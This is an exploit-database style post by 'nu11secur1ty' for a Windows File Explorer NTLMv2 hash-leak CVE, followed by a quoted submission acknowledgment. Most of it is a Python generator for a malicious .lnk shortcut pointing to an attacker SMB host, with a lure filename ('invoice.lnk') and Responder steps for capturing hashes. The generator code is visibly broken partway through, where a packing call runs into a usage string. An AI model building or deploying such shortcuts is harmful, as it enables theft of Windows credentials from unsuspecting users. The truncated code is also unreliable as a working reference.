# Titles: Microsoft - NTLMv2 Hash Capture # Author: nu11secur1ty # Date: 2026-05-27 # Vendor: Microsoft # Software: Windows Shell (File Explorer) # Reference: https://nvd.nist.gov/vuln/detail/CVE-2026-32202 ## Description: A spoofing vulnerability in Windows Shell (File Explorer) allows an attacker to capture NTLMv2 hashes without user interaction. By crafting a malicious .lnk (shortcut) file with a UNC path pointing to an attacker-controlled SMB server, the target's Windows system automatically sends an NTLMv2 authentication request when the folder containing the .lnk file is opened. No click on the shortcut is required – simply viewing the folder triggers the vulnerability. **CVSS**: 4.3 (Medium) – NetNTLMv2 hash leak **Attack Vector**: Network (SMB) **Privileges Required**: None (user only needs to open a folder) **User Interaction**: None (zero-click) **Affected Versions**: - Windows 11 23H2, 24H2, 25H2, 26H1 - Windows 10 21H2-22H2 - Windows Server 2019/2022/2025 **Patch**: Microsoft April 2026 Patch Tuesday (KB2026-04214) STATUS: MEDIUM - HIGH/ Vulnerability [+]Payload: ```POST SMB/CIFS NTLMv2 Authentication Request UNC Path: \\ATTACKER_IP\share\payload.dll Protocol: SMB2 (port 445) Hash Type: NetNTLMv2 ``` [+]Exploit: ``` #!/usr/bin/env python3 """ CVE-2026-32202 LNK Exploit Generator Author: nu11secur1ty Generates LNK file that leaks NTLM hash to Responder/Impacket """ import struct import sys import os def create_malicious_lnk(attacker_ip, output_file="exploit.lnk", share_name="share"): """ Creates LNK file with UNC path to attacker machine """ unc_path = f"\\\\{attacker_ip}\\{share_name}\\test" unc_utf16 = unc_path.encode('utf-16le') + b'\x00\x00' # LNK structure (standard + vulnerable component) lnk = bytearray() # ===== HEADER (76 bytes) ===== lnk.extend(struct.pack(' [output_file]") print("Example: python3 cve_2026_32202_gen.py 192.168.1.100 invoice.lnk") sys.exit(1) attacker_ip = sys.argv[1] output_file = sys.argv[2] if len(sys.argv) > 2 else "exploit.lnk" lnk_file, unc_path = create_malicious_lnk(attacker_ip, output_file) print(f"[+] Exploit ready!") print(f"[+] File: {lnk_file}") print(f"[+] UNC path: {unc_path}") print() print("[*] Next steps:") print(f" 1. Start Responder: sudo responder -I eth0 -v") print(f" 2. Transfer {lnk_file} to Windows 11 Desktop") print(f" 3. Open Desktop in File Explorer (no click required)") print(f" 4. Watch Responder - NTLM hash will appear") print() with open("start_responder.sh", "w") as f: f.write("#!/bin/bash\n") f.write("echo \"[+] Starting Responder...\"\n") f.write("sudo responder -I eth0 -v\n") os.chmod("start_responder.sh", 0o755) print("[+] Helper script created: start_responder.sh") if __name__ == "__main__": main() ``` Demo: [href](https://www.patreon.com/posts/cve-2026-32202-159362448) Code: [code]( https://github.com/nu11secur1ty/CVE-mitre/tree/main/2026/CVE-2026-32202) Time spent: 02:30:00 -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html https://cxsecurity.com/ and https://www.exploit-db.com/ home page: https://www.asc3t1c-nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty https://www.asc3t1c-nu11secur1ty.com/ On Wed, May 27, 2026 at 2:06 PM Offsec Exploits < submit@offensive-security.com> wrote: > Hello, > > Thank you for your submission. > We will be checking it shortly. > > Regards > - Exploit-DB Team > -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstorm.news/ https://cve.mitre.org/index.html https://cxsecurity.com/ and https://www.exploit-db.com/ 0day Exploit DataBase https://0day.today/ home page: https://www.asc3t1c-nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty